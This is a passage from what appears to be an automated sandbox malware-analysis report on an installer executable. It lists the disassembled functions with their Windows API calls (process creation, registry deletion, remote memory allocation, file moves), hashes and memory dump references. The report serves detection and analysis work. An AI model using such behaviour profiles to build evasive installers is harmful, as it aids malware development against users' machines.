                                                                  • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                  • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                  • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                  Function 00405796 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                  • CloseHandle.KERNEL32(?), ref: 004057CC
                                                                  Strings
                                                                  • Error launching installer, xrefs: 004057A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                  • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                  • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                  • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                  Function 00402588 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswE071.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseValue
                                                                  • String ID:
                                                                  • API String ID: 397863658-0
                                                                  • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                  • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                                  • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                  • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                                  Function 00402516 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswE071.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3356406503-0
                                                                  • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                  • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                                  • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                  • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                  • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                                  • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                  • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                                  Function 00402421 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteValue
                                                                  • String ID:
                                                                  • API String ID: 2831762973-0
                                                                  • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                                  • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                                  • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                                  • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                                  Function 00401EC5 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnableShow
                                                                  • String ID:
                                                                  • API String ID: 1136574915-0
                                                                  • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                                  • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                                  • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                                  • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                                  Function 00406500 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                    • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                    • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                    • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                  • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                                  • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                  • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                                  Function 00405C90 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                  • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                  • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                  • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                  Function 00405761 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                  • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                  • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                                  • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                  • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                                  Function 6FF82A38 Relevance: 1.6, APIs: 1, Instructions: 143memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(00000000), ref: 6FF82AF7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 318f3224a2bb206b144c4713ea242cd0e510a0e5e0584c21d2b991103474b13d
                                                                  • Instruction ID: 0679b1c76833ecbec6b59515d91fe3cd72b3d437a60ade18b6ae6cd99b01115d
                                                                  • Opcode Fuzzy Hash: 318f3224a2bb206b144c4713ea242cd0e510a0e5e0584c21d2b991103474b13d
                                                                  • Instruction Fuzzy Hash: 52414F72514704DFDF20DFA4D881B6A37B8FF46368F204466E525CB3A0D73AB491ABA1
                                                                  Function 0040266D Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: wsprintf
                                                                  • String ID:
                                                                  • API String ID: 2111968516-0
                                                                  • Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                                  • Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
                                                                  • Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                                  • Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19
                                                                  Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FileMove
                                                                  • String ID:
                                                                  • API String ID: 3562171763-0
                                                                  • Opcode ID: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                                  • Instruction ID: c16fe538d576f0a812f108a5c598968f2bbae53de2c44bc87e09c6d73b5458c5
                                                                  • Opcode Fuzzy Hash: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                                  • Instruction Fuzzy Hash: EEF01D3160852496DB20ABA54E49E5F3264DB42769B24033BF422B21D1EABC8542956E
                                                                  Function 0040272B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointerwsprintf
                                                                  • String ID:
                                                                  • API String ID: 327478801-0
                                                                  • Opcode ID: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                                  • Instruction ID: d2cb0ca5e863be2ef59b536234997f243a65a7806d73518010ac019a9530af38
                                                                  • Opcode Fuzzy Hash: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                                  • Instruction Fuzzy Hash: 7EE09271B00114EED711FBA4AE49DBF77B8EB40315B10403BF102F10C1CABC49128A2E
                                                                  Function 0040239C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 390214022-0
                                                                  • Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                                  • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                                  • Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                                  • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                                  Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                  Memory Dump Source
